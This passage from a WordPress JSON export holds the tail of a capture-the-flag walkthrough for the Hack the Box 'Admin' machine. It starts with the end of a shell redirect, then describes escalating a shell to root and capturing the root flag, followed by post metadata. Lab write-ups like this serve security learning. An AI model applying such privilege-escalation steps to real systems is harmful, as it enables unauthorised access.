class=\"crayon-cn\">0<\/span> <span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"https:\/\/i2.wp.com\/1.bp.blogspot.com\/-CJlx_DVrpWA\/Xrw8VV3_yDI\/AAAAAAAAkBo\/GG4gQRfog_E6mJf4hUKC4OKhu2kf6r6WQCLcBGAsYHQ\/s1600\/26.png?w=687&amp;ssl=1\" alt=\"Admin Box\" width=\"457\" height=\"200\" data-recalc-dims=\"1\" \/><\/p>\n<p>Once we execute the command, we escalate our shell to root.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"https:\/\/i0.wp.com\/1.bp.blogspot.com\/-HM4NTWzB0Gs\/Xrw8VhfAXlI\/AAAAAAAAkBs\/0mrDPdxfwJ4SEAfMFvzbC5Kxi0XU4TKAgCLcBGAsYHQ\/s1600\/27.png?w=687&amp;ssl=1\" alt=\" Admin Box zerothcode\" width=\"351\" height=\"128\" data-recalc-dims=\"1\" \/><\/p>\n<p>Here we got our root flag\u2026 That explains it all. So that\u2019s for now. See you next time. Admin Box<\/p>\n<p>HAPPY HACKING!! ????<\/p>\n<p>&nbsp;<\/p>\n<p>More CTF: <a href=\"http:\/\/zerothcode.com\/blog\/node-1-ctf-walkthrough\/\">http:\/\/zerothcode.com\/blog\/node-1-ctf-walkthrough\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Admin Box Today, I am going to share a writeup for the boot2root challenge of the Hack the Box machine<\/p>\n","protected":false},"author":1,"featured_media":911,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[487],"tags":[],"yst_prominent_words":[722,1372,1373,1367,1362,1359,689,481,1361,1279,1360,1370,1364,1368,1182,1365,1363,496,1366,1369],"class_list":["post-910","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf"],"_links":{"self":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/posts\/910","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/comments?post=910"}],"version-history":[{"count":0,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/posts\/910\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/media\/911"}],"wp:attachment":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/media?parent=910"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/categories?post=910"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/tags?post=910"},{"taxonomy":"yst_prominent_words","embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/yst_prominent_words?post=910"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}